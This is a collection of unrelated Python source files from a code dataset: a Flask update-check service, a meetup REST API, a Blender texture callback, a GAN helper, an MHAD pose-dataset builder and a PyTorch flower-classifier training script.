'yusy.song@ejabhost1',\n# 'ju.ma@ejabhost1', 'dan.liu@ejabhost1', 'chaocc.wang@ejabhost1'}\n\n# global_user_black_list = {'lei.lei@ejabhost1', 'xinyu.yang@ejabhost1'}\n\n\ndef download_file(filename, beta=False):\n global localDir\n\n try:\n params = filename.split(\"/\")\n\n realname = filename.replace(\"%s/\" % params[0], '', 1)\n\n if params[0].lower() == \"linux\":\n workerDir = linuxDir\n updater_name = 'updater'\n elif params[0].lower() == \"mac\":\n\n workerDir = macDir if beta else macProdDir\n updater_name = 'updater'\n # return jsonify({\"ret\": 0, \"err_msg\": \"platform %s is not support yet...\" % platform})\n elif params[0].lower() == \"pc32\":\n workerDir = windows32Dir if beta else windows32ProcDir\n updater_name = 'updater.exe'\n elif params[0].lower() == \"pc64\":\n workerDir = windows64Dir if beta else windows64ProdDir\n updater_name = 'updater.exe'\n else:\n return {\"ret\": 0, \"err_msg\": \"platform %s is not support yet...\" % platform}\n\n path = os.path.join(workerDir, realname)\n updatecheck_logger.debug(\"path is \" + path)\n if os.path.isfile(path):\n updatecheck_logger.debug(\"file exist\")\n response = make_response(\n send_from_directory(os.path.join(workerDir, 'static'), filename, as_attachment=True))\n updatecheck_logger.debug(\"response is {}\".format(response))\n\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(\n filename.encode().decode('latin-1'))\n return response\n # return send_from_directory(localDir, filename, as_attachment=True)\n except Exception as e:\n updatecheck_logger.error(\"path error! 
\" + str(e))\n abort(404)\n abort(405)\n\n\ndef upload_file(filename):\n pass\n\n\n@updatecheck_blueprint.route('/updatecheck', defaults={'path': ''})\n@updatecheck_blueprint.route('/updatecheck/<path:path>', methods=['GET', 'POST'])\ndef catch_all(path):\n root = request.url.replace(path, '')\n if path.startswith(\"download/\"):\n return download_file(path[9:])\n elif path.startswith(\"betadownload/\"):\n return download_file(path[13:],beta=True)\n elif path.startswith(\"upload/\"):\n return upload_file(path[7:])\n elif path == \"tools/test\":\n return jsonify(version_check_functions.running_test())\n elif path == \"version/reload\":\n content = request.json\n pm = content['platform']\n return jsonify(version_check_functions.reload_version(root, content))\n elif path == \"version/check\":\n # platform = request.args.get('platform')\n # filename = request.args.get('f')\n content = request.json\n if not content:\n try:\n content = json.loads(request.data)\n except:\n updatecheck_logger.warning(\"CANT FIND CONTENT {}\".format(request.data))\n content = []\n\n return jsonify(version_check_functions.check_version(root, content))\n else:\n return \"Welcome!\"\n\n\n@updatecheck_blueprint.route('/checkupdater', methods=['GET', 'POST'])\ndef version_compare():\n args = request.args\n user = args.get('user', '')\n exec = args.get('exec', '').lower()\n version = int(args.get('version', 0))\n __platform = args.get('platform').lower()\n if not __platform or not exec:\n abort(405)\n if exec != \"qtalk\":\n return jsonify(ret=True, link='')\n\n if user in global_user_black_list:\n return jsonify(ret=True, link='')\n elif version < current_updater_version:\n if __platform == 'pc32':\n return jsonify(ret=True, link=pc32_link)\n elif __platform == 'pc64':\n return jsonify(ret=True, link=pc64_link)\n elif __platform == 'linux':\n return jsonify(ret=True, link=linux_link)\n elif __platform == 'mac':\n return jsonify(ret=True, link=macos_link)\n else:\n return jsonify(ret=True, link='')\n else:\n return jsonify(ret=True, link='')\n\n\n\n","repo_name":"gtouchgogo/qtalk_search","sub_path":"service/updatecheck/updatecheck.py","file_name":"updatecheck.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13477275192","text":"\"\"\"Meetup Views Module\"\"\"\n# Third Party Imports.\nimport json\nfrom flask import Response\nfrom flask_restplus import reqparse, Resource\n\n\n# Local Imports\nfrom ..models.meetup_model import Meetup\nfrom ..utils.serializer import MeetupDataTransferObject\n\nmeetup_api = MeetupDataTransferObject.meetup_namespace\n\nparser = reqparse.RequestParser()\n# Meetup Arguments\nparser.add_argument(\"location\", type=str ,required=True, help=\"Please enter meetup location.\")\nparser.add_argument(\"image1\", required=True, help=\"Please enter meetup image.\")\nparser.add_argument(\"image2\", help=\"Please enter meetup image.\")\nparser.add_argument(\"image3\", help=\"Please enter meetup image.\")\nparser.add_argument(\"topic\", type=str ,required=True, help=\"Please enter meetup topic.\")\nparser.add_argument(\"happening_on\", type=str ,required=True, help=\"Please enter meetup date.\")\nparser.add_argument(\"tag1\", required=True, help=\"Please enter meetup tag.\")\nparser.add_argument(\"tag2\", required=True, help=\"Please enter meetup tag.\")\nparser.add_argument(\"tag3\", required=True, help=\"Please enter meetup tag.\")\n\nmeetup_request_model = 
MeetupDataTransferObject.meetup_request_model\n\n@meetup_api.route('', '/upcoming')\nclass MeetupList(Resource):\n \"\"\"Meetup endpoint.\"\"\"\n @meetup_api.expect(meetup_request_model, validate=True)\n def post(self):\n \"\"\"Performing a POST request.\"\"\"\n request_data = parser.parse_args()\n location = request_data[\"location\"]\n image1 = request_data[\"image1\"]\n image2 = request_data[\"image2\"]\n image3 = request_data[\"image3\"]\n topic = request_data[\"topic\"]\n happening_on = request_data[\"happening_on\"]\n tag1 = request_data[\"tag1\"]\n tag2 = request_data[\"tag2\"]\n tag3 = request_data[\"tag3\"]\n\n images = [image1, image2, image3]\n tags = [tag1, tag2, tag3]\n\n new_meetup = Meetup(location, images, topic, happening_on, tags)\n create_meetup = new_meetup.create_new_meetup()\n response_payload = dict(\n status=201,\n message=\"Meetup was created successfully.\",\n data=create_meetup\n )\n response = Response(json.dumps(response_payload), status=201, mimetype=\"application/json\")\n return response\n\n\n def get(self):\n \"\"\"Fetching All Meetups\"\"\"\n meetups = Meetup.fetch_all_meetups(self)\n response_payload = {\n \"status\": 200,\n \"data\": meetups\n }\n response = Response(json.dumps(response_payload), status=200, mimetype=\"application/json\")\n return response\n\n@meetup_api.route('/<int:meetup_id>')\nclass SingleMeetup(Resource):\n \"\"\"Deals with operations on single meetup record.\"\"\"\n def get(self, meetup_id):\n \"\"\"Getting a specific meetup\"\"\"\n meetup = Meetup.fetch_single_meetup(meetup_id)\n response_payload = {\n \"status\": 200,\n \"data\": meetup\n }\n response = Response(json.dumps(response_payload), status=200, mimetype=\"application/json\")\n return response\n\n","repo_name":"TheAlchemistKE/Questioner-API","sub_path":"app/api/v1/views/meetup_views.py","file_name":"meetup_views.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"126087064","text":"# Author: Axel Antoine\n# https://axantoine.com\n# 01/26/2021\n\n# Loki, Inria project-team with Université de Lille\n# within the Joint Research Unit UMR 9189 CNRS-Centrale\n# Lille-Université de Lille, CRIStAL.\n# https://loki.lille.inria.fr\n\n# LICENCE: Licence.md\n\nimport bpy\nimport os\nfrom bpy.app.handlers import persistent\nimport bgl\n\nSCREEN_TAG = \"EScreen\"\n\n@persistent\ndef detect_interface_callback(dummy):\n\tif bpy.context.scene.esquisse.is_rendering:\n\t\treturn\n\t\t\n\tfor obj in bpy.context.scene.objects:\n\t\tif obj.esquisse.isScreen :\n\t\t\tif obj.esquisse.screen_properties.use_interface:\n\t\t\t\t\n\t\t\t\ttexture_path = bpy.path.abspath(obj.esquisse.screen_properties.interface_path)[:-3] + \"png\"\n\n\t\t\t\tif not obj.esquisse.screen_properties.texture_loaded:\n\t\t\t\t\t# Try to load the texture (PNG) with the same interface name\n\n\t\t\t\t\t# Check if file exists\n\t\t\t\t\tif os.path.isfile(texture_path):\n\n\t\t\t\t\t\t# Load the texture in the blender data\n\t\t\t\t\t\ttexture = bpy.data.images.load(texture_path)\n\n\t\t\t\t\t\t# Iterate over the current images stored in blender to get the key of the new image (should be filename, but not sure)\n\t\t\t\t\t\ttexture_id = None\n\t\t\t\t\t\tfor item in bpy.data.images.items():\n\t\t\t\t\t\t\tkey, value = item\n\t\t\t\t\t\t\tif value == texture:\n\t\t\t\t\t\t\t\ttexture_id = key\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t# Set the texture as loaded\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = 
True\n\t\t\t\t\t\t# Set the texture identifier of blender data images\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = texture_id\n\n\t\t\t\t\t\tprint(\"Loaded %s texture in blender images for screen : %s.\"%(texture_id,obj.name))\n\n\t\t\t\telse:\n\t\t\t\t\t# Check if the loaded texture for the screen has changed or is still loaded\n\t\t\t\t\tif obj.esquisse.screen_properties.texture_id not in bpy.data.images.keys():\n\t\t\t\t\t\t# Delete current texture identifier in blender data\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = \"\"\n\t\t\t\t\t\t# Set the texture for the current screen obj as not loaded to be loaded in the next function callback call\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = False\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# get the filepath of the current texture stored in blender data for the current screen obj\n\n\t\t\t\t\tloaded_texture = bpy.data.images[obj.esquisse.screen_properties.texture_id]\n\n\t\t\t\t\t# check if the current screen obj interface path is the same stored in blender data\n\t\t\t\t\tif not loaded_texture.filepath == texture_path:\n\n\t\t\t\t\t\t# If filepath different, then it's a different texture\n\t\t\t\t\t\t# Remove texture from blender data\n\t\t\t\t\t\tbpy.data.images.remove(loaded_texture)\n\t\t\t\t\t\t# Delete current texture identifier in blender data\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = \"\"\n\t\t\t\t\t\t# Set the texture for the current screen obj as not loaded to be loaded in the next function callback call\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = False\n\n@persistent\ndef load_default_interface(dummy):\n\tdir_path = os.path.dirname(os.path.realpath(__file__))\n\tfilename = 'Esquisse_Default_interface.png'\n\ttexture_path = os.path.join(dir_path, filename)\n\tif not os.path.exists(texture_path):\n\t\tprint(\"Can't find default interface %s\" % texture_path)\n\t\treturn\n\n\ttexture = None\n\tif filename not in bpy.data.images.keys():\n\t\ttexture = bpy.data.images.load(texture_path)\n\n\tfor obj in bpy.context.scene.objects:\n\t\tif obj.esquisse.isScreen:\n\t\t\tobj.esquisse.screen_properties.default_texture_id = filename\n\n\n\n\ndef register():\t\n\tbpy.app.handlers.scene_update_post.append(detect_interface_callback)\n\tbpy.app.handlers.scene_update_post.append(load_default_interface)\n\t\ndef unregister():\n\tbpy.app.handlers.scene_update_post.remove(detect_interface_callback)\n\tbpy.app.handlers.scene_update_post.remove(load_default_interface)\n\n","repo_name":"LokiResearch/EsquisseBlender","sub_path":"code/Esquisse/callback_textures_loading.py","file_name":"callback_textures_loading.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"9025656058","text":"from Package.BaseDev.tools import BaseTool\nimport torch\n\n\nclass DevTool(BaseTool):\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def make_target(\n            batch_size: int,\n            is_real_image: bool,\n            *args,\n            **kwargs\n    ) -> torch.Tensor:\n        if is_real_image:\n            res = torch.ones(size=(batch_size, ), dtype=torch.float32)\n\n        else:\n            res = torch.zeros(size=(batch_size, ), dtype=torch.float32)\n        return res\n\n    @staticmethod\n    def split_target(\n            *args,\n            **kwargs\n    ):\n        raise RuntimeError(\n            \"we do not need this method(split_target)!\"\n        )\n\n    @staticmethod\n    def split_predict(\n            *args,\n            **kwargs\n    ):\n        raise RuntimeError(\n            \"we do not need this method(split_predict)!\"\n        
)\n","repo_name":"diyage/AllYouNeed","sub_path":"Package/Task/GAN/D2/Dev/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
{"seq_id":"12224625576","text":"from glob import glob\nimport os\nfrom subprocess import call\n\nimport cv2\nimport h5py\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\ndef parse_cam_cfg(fname):\n    \"\"\"\n    Parse camera configuration YAML file generated w/ OpenCV\n    :param fname: str, camera configuration file name\n    :return: dict, camera configuration\n    \"\"\"\n    f = cv2.FileStorage(fname, cv2.FILE_STORAGE_READ)\n    cam_cfg = {}\n    cam_cfg[\"K\"] = f.getNode(\"Camera_1\").getNode(\"K\").mat().astype(np.float32)\n    cam_cfg[\"dist\"] = f.getNode(\"Camera_1\").getNode(\"Dist\").mat().astype(np.float32)\n    cam_cfg[\"resolution\"] = (\n        int(f.getNode(\"Camera_1\").getNode(\"imgHeight\").real()),\n        int(f.getNode(\"Camera_1\").getNode(\"imgWidth\").real()))\n\n    return cam_cfg\n\n\ndef parse_video(video_dir, frames_indices):\n    \"\"\"\n    Read RGB and depth video from a given folder\n    :param video_dir: str, directory with RGB + depth frames\n    :param frames_indices: iterable, indices of the frames to read\n    :return: np.arrays, rgb and depth videos\n    \"\"\"\n    rgb = []\n    depth = []\n    for frame_idx in frames_indices:\n        frame_idx = int(frame_idx)\n        rgb_frame = glob(os.path.join(video_dir, \"*color_%05d*\" % frame_idx))\n        depth_frame = glob(os.path.join(video_dir, \"*depth_%05d*\" % frame_idx))\n        rgb.append(cv2.imread(rgb_frame[0], -1)[:, :, ::-1])\n        depth.append(cv2.imread(depth_frame[0], -1))\n\n    return np.array(rgb), np.array(depth)\n\n\ndef parse_mocap(fname, joints_names, frames_indices):\n    \"\"\"\n    Parse mocap data in a given BVH file\n    :param fname: str, bvh file name\n    :param joints_names: list, required joints names\n    :param frames_indices: iterable, indices of the mocap frames to read\n    :return: np.array, 3d joints\n    \"\"\"\n    data = np.genfromtxt(fname, dtype=float, delimiter=',', names=True)\n    full_pose_3d = []\n    for frame_idx in frames_indices:\n        frame_idx = int(frame_idx) + 1\n        pose_3d = []\n        for joint in joints_names:\n            joint_pos = (data[joint + \"X\"][frame_idx], data[joint + \"Y\"][frame_idx], data[joint + \"Z\"][frame_idx])\n            pose_3d.append(joint_pos)\n        full_pose_3d.append(pose_3d)\n\n    return np.array(full_pose_3d) * 10\n\n\ndef bmhad_to_ours(joints):\n    num_frames = joints.shape[0]\n    new_joints = np.zeros((num_frames, 12, joints.shape[2]))\n    head_sizes = np.zeros((num_frames))\n\n    for idx, current_joints in enumerate(joints):\n        new_joints[idx, 0] = np.mean(current_joints[:2], axis=0).astype(joints.dtype)  # head\n        new_joints[idx, 1:7] = current_joints[2:8]\n        new_joints[idx, 7:9] = current_joints[9:11]\n        new_joints[idx, 9:11] = current_joints[12:14]\n        new_joints[idx, 11] = np.mean(current_joints[np.array([8, 11])], axis=0).astype(joints.dtype)  # pelvis\n        head_sizes[idx] = np.linalg.norm(current_joints[0] - current_joints[1])\n\n    return new_joints, head_sizes\n\n\ndef get_cam_params(cam):\n    \"\"\"\n    Get camera parameters\n    :param cam: str, cam ID\n    :return: dict, camera parameters (extrinsics, intrinsics and distortion)\n    \"\"\"\n    # KINECT params\n    K = {}\n    if cam == \"k02\":\n        K[\"R\"] = np.reshape([-0.798016667, - 0.041981064, 0.601171315, -0.059102636, -0.987309396, -0.147400886, 0.599730134, -0.153159171, 0.785408199], (3, 3)).T.astype(np.float64)\n        K[\"t\"] = np.array([[26.147224426, 853.124328613, 
2533.297607422]]).T.astype(np.float64)\n K[\"K\"] = np.reshape([532.33691406, 0., 323.22338867, 0., 532.80218506, 265.27493286, 0., 0., 1.], (3, 3)).astype(np.float64)\n K[\"d\"] = np.array([0.18276334, -0.35502717, -6.75550546e-004, -9.90863307e-004]).T.astype(np.float64)\n elif cam == \"k01\":\n K[\"R\"] = np.reshape([0.869593024, 0.005134047, -0.493742496, 0.083783410, -0.986979902, 0.137298822, -0.486609042, -0.160761520, -0.858700991], (3, 3)).T.astype(np.float64)\n K[\"t\"] = np.array([[-844.523864746, 763.838439941, 3232.193359375]]).T.astype(np.float64)\n K[\"K\"] = np.reshape([531.49230957, 0., 314.63775635, 0., 532.39190674, 252.53335571, 0., 0., 1.], (3, 3)).astype(np.float64)\n K[\"d\"] = np.array([0.19607373, -0.36734107, -2.47962005e-003, -1.89774996e-003]).T.astype(np.float64)\n else:\n raise Exception(\"Unknown cam: %s\" % cam)\n\n K[\"T\"] = np.append(np.append(K[\"R\"].T, K[\"t\"], axis=1), np.array([[0, 0, 0, 1]]).astype(np.float64), axis=0).astype(np.float64)\n\n return K\n\ndef project_points(K, joints):\n \"\"\"\n Project world coordinates into image plane given camera parameters.\n :param K: dict, camera parameters\n :param joints: np.array, world coordinates\n :return: np.array, image plane coordinates\n \"\"\"\n # Homogeneous transformation matrix from world coordinate frame to camera coordinate frame\n joints = np.float32(joints).reshape(-1,3)\n new_joints = np.zeros_like(joints)\n new_joints[:, 0] = joints[:, 1]\n new_joints[:, 1] = joints[:, 2]\n new_joints[:, 2] = joints[:, 0]\n rvec = cv2.Rodrigues(K[\"R\"].T)[0]\n\n joints_2d, _ = cv2.projectPoints(new_joints, rvec, K[\"t\"], K[\"K\"], K[\"d\"])\n joints_3d = np.zeros_like(joints)\n for idx, joint in enumerate(new_joints):\n joints_3d[idx] = np.dot(K[\"T\"], np.append(joint, [1]).T)[:3]\n\n return np.squeeze(joints_2d), joints_3d\n\n\ndef build_dataset(fname, data_dir, scene_code, debug=False):\n \"\"\"\n Build a HDF5 dataset for the given subjects, actions, repetitions and cameras\n :param fname: str, resulting HDF5 file name\n :param data_dir: str, path to data folder\n :param scene_code: str, code for scene to be included in the dataset (subjectIDactionIDrepetitionID)\n :return: HDF5 object, resulting dataset\n \"\"\"\n joint_order = [\"HeadEnd\", \"Head\"]\n joint_order += [\"RightArm\", \"RightForeArm\", \"RightHand\"]\n joint_order += [\"LeftArm\", \"LeftForeArm\", \"LeftHand\"]\n joint_order += [\"RightUpLeg\", \"RightLeg\", \"RightFoot\"]\n joint_order += [\"LeftUpLeg\", \"LeftLeg\", \"LeftFoot\"]\n\n joint_order_fancier = [\"head\"]\n joint_order_fancier += [\"right_shoulder\", \"right_elbow\", \"right_hand\"]\n joint_order_fancier += [\"left_shoulder\", \"left_elbow\", \"left_hand\"]\n joint_order_fancier += [\"right_knee\", \"right_foot\"]\n joint_order_fancier += [\"left_knee\", \"left_foot\"]\n joint_order_fancier += [\"pelvis\"]\n\n scene_dir = os.path.join(data_dir, scene_code)\n\n f = h5py.File(fname, mode=\"w\")\n f.attrs[\"joint_order\"] = joint_order_fancier\n\n # Calibration\n calibration_dtype = np.dtype([\n (\"K\", np.float32, (3, 3)),\n (\"R\", np.float32, (3, 3)),\n (\"t\", np.float32, (3)),\n (\"dist\", np.float32, (4)),\n (\"resolution\", np.uint16, (2)),\n ])\n\n cam_id = \"k\" + scene_code.split(\"k\")[-1]\n cam_cfg_fname = os.path.join(data_dir, \"camcfg_%s.yml\" % cam_id)\n cam_cfg = parse_cam_cfg(cam_cfg_fname)\n\n # Pose and image data\n corr_frames = np.loadtxt(glob(os.path.join(scene_dir, \"corr*.txt\"))[0])\n num_frames = corr_frames.shape[0]\n\n im_height, im_width = 
cam_cfg[\"resolution\"]\n pose_dtype = np.dtype([\n (\"camera_id\", np.str_, 20),\n (\"subject_id\", np.str_, 20),\n (\"action_id\", np.str_, 20),\n (\"repetition_id\", np.str_, 20),\n (\"rgb_video\", np.uint8, (num_frames, im_height, im_width, 3)),\n (\"depth_video\", np.uint16, (num_frames, im_height, im_width)),\n (\"pose_2d\", np.float32, (num_frames, 12, 2)),\n (\"pose_3d\", np.float32, (num_frames, 12, 3)),\n (\"pose_3d_world\", np.float32, (num_frames, 12, 3)),\n (\"head_sizes_2d\", np.float32, (num_frames)),\n (\"head_sizes_3d\", np.float32, (num_frames)),\n ])\n f.create_dataset(\"calibration\", (1,), calibration_dtype)\n\n f.create_dataset(\"pose\", (1,), pose_dtype)\n\n video_frames = corr_frames[:, 0]\n rgb, depth = parse_video(os.path.join(scene_dir, \"video\"), video_frames)\n\n mocap_frames = corr_frames[:, 2]\n\n call([\"bvh-converter\", glob(os.path.join(scene_dir, \"*.bvh\"))[0]])\n joints_3d_world = parse_mocap(glob(os.path.join(scene_dir, \"*.csv\"))[0], joint_order, mocap_frames)\n\n K = get_cam_params(cam_id)\n\n joints_3d_aux = joints_3d_world.copy()\n joints_3d_world[:, :, 0] = joints_3d_aux[:, :, 2]\n joints_3d_world[:, :, 1] = joints_3d_aux[:, :, 0]\n joints_3d_world[:, :, 2] = joints_3d_aux[:, :, 1]\n joints_2d = np.zeros((joints_3d_world.shape[0], joints_3d_world.shape[1], 2))\n joints_3d_camera = np.zeros_like(joints_3d_world)\n for frame_idx, skel in enumerate(joints_3d_world):\n joints_2d[frame_idx], joints_3d_camera[frame_idx] = project_points(K, skel)\n\n joints_3d_world, _ = bmhad_to_ours(joints_3d_world)\n joints_3d_camera, head_sizes_3d = bmhad_to_ours(joints_3d_camera)\n joints_2d, head_sizes_2d = bmhad_to_ours(joints_2d)\n\n if debug:\n fig = plt.figure()\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122, projection='3d')\n\n def animate(i):\n ax1.clear()\n ax1.scatter(joints_2d[i, :, 0], joints_2d[i, :, 1], s=30)\n for idx, joint_2d in enumerate(joints_2d[i]):\n ax1.text(joint_2d[0] + 5, joint_2d[1] + 5, str(idx), color=\"red\", fontsize=9)\n ax1.imshow(rgb[i])\n\n ax2.clear()\n ax2.scatter(joints_3d_camera[i, :, 2], joints_3d_camera[i, :, 0], -joints_3d_camera[i, :, 1])\n ax2.set_xlim(2000, 4000)\n ax2.set_ylim(-1500, 500)\n ax2.set_zlim(-1000, 1000)\n ax2.view_init(30, i * 2)\n\n Writer = animation.writers['ffmpeg']\n writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n ani = animation.FuncAnimation(fig, animate, interval=1, save_count=num_frames)\n ani.save(os.path.join(data_dir, '%s.mp4' % scene_code), writer=writer)\n\n calibration = np.array((K[\"K\"], K[\"R\"], np.squeeze(K[\"t\"]), K[\"d\"], cam_cfg[\"resolution\"]), dtype=calibration_dtype)\n f[\"calibration\"][0] = calibration\n\n pose = np.array((\n cam_id,\n \"s\" + scene_code.split(\"s\")[-1][:2],\n \"a\" + scene_code.split(\"a\")[-1][:2],\n \"r\" + scene_code.split(\"r\")[-1][:2],\n rgb,\n depth,\n joints_2d,\n joints_3d_camera,\n joints_3d_world,\n head_sizes_2d,\n head_sizes_3d,\n ), dtype=pose_dtype)\n f[\"pose\"][0] = pose\n\n return f\n\n\nif __name__ == \"__main__\":\n data_dir = \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Tests/Datasets/BMHAD\"\n for scene_dir in glob(data_dir + \"/*r02*/\"):\n scene_code = scene_dir.split(\"/\")[-2]\n print(\"Parsing %s\" % scene_code)\n fname = os.path.join(data_dir, \"hdf5/bmhad_%s.h5\" % scene_code)\n dataset = build_dataset(fname, data_dir, scene_code=scene_code, debug=True)\n 
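# Hypothetical sanity check (added sketch): inspect the compound field names of\n        # the freshly written 'pose' record before the HDF5 file is closed below.\n        print(dataset[\"pose\"].dtype.names)\n        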
dataset.close()\n","repo_name":"RoboticsLabURJC/2017-tfm-david-pascual","sub_path":"src/Estimator/Tests/Datasets/build_bmhad_dataset.py","file_name":"build_bmhad_dataset.py","file_ext":"py","file_size_in_byte":10715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"35037103326","text":"# Imports here\nimport matplotlib.pyplot as plt\nimport torch \nfrom torchvision import datasets, transforms, models\nfrom torch import nn\nfrom torch import optim \nimport torch.nn.functional as F \nfrom collections import OrderedDict\nfrom PIL import Image\nimport numpy as np\nfrom torch.autograd import Variable\nimport argparse\nimport time\nimport json\n\n#initiate variables with default values:\n\narch= 'vgg19'\nhidden_units=1024\nlearning_rate= 0.001\nepochs= 5\ndevice= 'cpu' \n#------------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument('--data_dir',type= str, help='train on the data directory')\nparser.add_argument('--save_dir',action='store', help='the path where to save the checkpoint')\nparser.add_argument('--arch', default='vgg19',action='store',type=str, help='choose among 3 pretrained networks: vgg19, alexnet,densenet121')\nparser.add_argument('--learning_rate',action='store', type=float, default=0.001, help='choose a float No. as the learning rate for the model')\nparser.add_argument('--hidden_units',action='store', type=int, default=1024)\nparser.add_argument('--epochs', type=int, default=5)\nparser.add_argument('--gpu', action='store_true')\nargs = parser.parse_args()\n#------------------------------------------------\n#select parameters entered in command line:\n\nif args.arch:\n    arch=args.arch\n    \nif args.hidden_units:\n    hidden_units= args.hidden_units\n    \nif args.learning_rate:\n    learning_rate= args.learning_rate\n    \nif args.epochs:\n    epochs= args.epochs\n    \nif args.gpu:\n    #initialize device to run on (GPU or CPU) \n    device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n    \n    \n\ndata_dir = 'flowers'\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n#------------------------------------------------\n\ntrain_transforms = transforms.Compose([\n                                transforms.Resize(256),\n                                transforms.RandomRotation(30),\n                                transforms.RandomHorizontalFlip(),\n                                transforms.RandomResizedCrop(224),\n                                transforms.ToTensor(), transforms.Normalize(\n                                    mean=[0.485, 0.456, 0.406],\n                                    std=[0.229, 0.224, 0.225]),])\n\nvalid_transforms = transforms.Compose([transforms.Resize(256),\n                                      transforms.CenterCrop(224),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize([0.485, 0.456, 0.406], \n                                                           [0.229, 0.224, 0.225])\n                                     ])\n\n\n# TODO: Load the datasets with ImageFolder\ntrain_datasets = datasets.ImageFolder(train_dir,transform=train_transforms) \nvalid_datasets = datasets.ImageFolder(valid_dir,transform=valid_transforms) \n \n\nimage_datasets = {\"train\": train_datasets, \n                  \"validation\": valid_datasets \n                 }\n\n# TODO: Using the image datasets and the transforms, define the dataloaders\ntrainloaders = torch.utils.data.DataLoader(train_datasets,batch_size=34, shuffle=True)\nvalidloaders = torch.utils.data.DataLoader(valid_datasets,batch_size=34)\n\ndataloaders= [trainloaders, validloaders]\n
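\n# Hedged note (added): the Normalize means/stds in the transforms above are the\n# standard ImageNet statistics that torchvision's pretrained models expect.\n\n#------------------------------------------------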
\ndef create_model(arch='vgg19', hidden_units=1024, learning_rate=0.001):\n    '''\n    function builds model\n    input: model architecture, hidden units, and learning rate\n    output: model, criterion, optimizer\n    '''\n    #load a pretrained network: choose vgg19 \n    model = getattr(models, arch)(pretrained=True)\n    in_features= model.classifier[0].in_features\n    #model\n    #turn off gradients for our model \n    for param in model.parameters():\n        param.requires_grad= False\n    #defining a new feed-forward classifier using ReLu activation function\n    classifier= nn.Sequential(OrderedDict([\n                          ('fc1',nn.Linear(in_features,hidden_units)),\n                          ('relu',nn.ReLU()),\n                          ('drop', nn.Dropout(0.2)),\n                          ('fc2',nn.Linear(hidden_units,102)),\n                          ('output',nn.LogSoftmax(dim=1))\n                          ]))\n    model.classifier=classifier\n    model\n    #define negative log likelihood loss\n    criterion= nn.NLLLoss()\n    #define optimizer \n    optimizer= optim.Adam(model.classifier.parameters(), lr=learning_rate)\n    #scheduler= lr_scheduler.stepLR(optimizer, step_size=2, gamma=0.1, epoch=-1)\n    \n    return model, criterion, optimizer\n#------------------------------------------------\nmodel, criterion, optimizer= create_model(arch, hidden_units, learning_rate)\nprint('-' * 10)\nprint('your model was successfully built!')\nprint('-' * 10)\n#------------------------------------------------\ndef train_model(model, criterion, optimizer, epochs=4):\n    '''\n    function: trains the pretrained model and classifier on the image datasets, and validates.\n    input: model, criterion, optimizer, epochs(default=4)\n    output: trained model\n    \n    '''\n    print_every=5\n    running_loss=0\n    accuracy=0\n    step=0\n    run_accuracy=0\n    train_losses, valid_losses = [], []\n    train_accuracy, valid_accuracy = [], []\n    model.to(device)\n    \n    #define best model weights and best accuracy\n    \n\n    print('begin training')\n    start=time.time()\n    #start training \n\n    # 1- training loop: looping through epochs\n    model.train()\n\n    for epoch in range (epochs):\n        print('Epoch {}/{}'.format(epoch+1, epochs))\n        print('-' * 10)\n        \n        # 2- looping through data\n        for inputs,labels in trainloaders:\n            \n            \n            #move input & label tensors to default device\n            inputs, labels= inputs.to(device), labels.to(device)\n            step+=1\n            optimizer.zero_grad()\n            #Forward\n            log_ps=model.forward(inputs)\n            loss=criterion(log_ps, labels)\n            #Backward\n            loss.backward()\n            #take a step\n            optimizer.step()\n            #increment running loss, it's where we keep track of our running loss\n            running_loss+=loss.item()\n            \n            # calculate the accuracy\n            ps = torch.exp(log_ps) # get the actual probability\n            top_p, top_class = ps.topk(1, dim=1) # top probabilities and classes\n            equals = top_class == labels.view(*top_class.shape)\n            \n            run_accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n            \n            if step% print_every==0:\n                valid_loss=0\n                accuracy=0\n                model.eval()\n                with torch.no_grad():\n                    for inputs,labels in validloaders:\n                        \n                        inputs, labels= inputs.to(device), labels.to(device)\n                        log_ps=model.forward(inputs)\n                        batch_loss=criterion(log_ps, labels)\n                        valid_loss+=batch_loss.item()\n                        #calculating accuracy\n                        ps = torch.exp(log_ps)\n                        #top class, largest value in our prob.\n                        top_p, top_class = ps.topk(1, dim=1)\n                        #check for equality\n                        equals = top_class == labels.view(*top_class.shape)\n                        accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n                \n                \n                \n                \n                \n                train_losses.append(running_loss/len(trainloaders))\n                valid_losses.append(valid_loss/len(validloaders))\n                train_accuracy.append(run_accuracy/len(trainloaders))\n                valid_accuracy.append(accuracy/len(validloaders))\n                \n                print(\n                    f\"Train loss: {running_loss/print_every:.3f}.. \"\n                    f\"Valid loss: {valid_loss/len(validloaders):.3f}.. \"\n                    f\"Train accuracy: {run_accuracy/print_every:.3f}.. \"\n                    f\"Valid accuracy: {accuracy/len(validloaders):.3f}.. \")
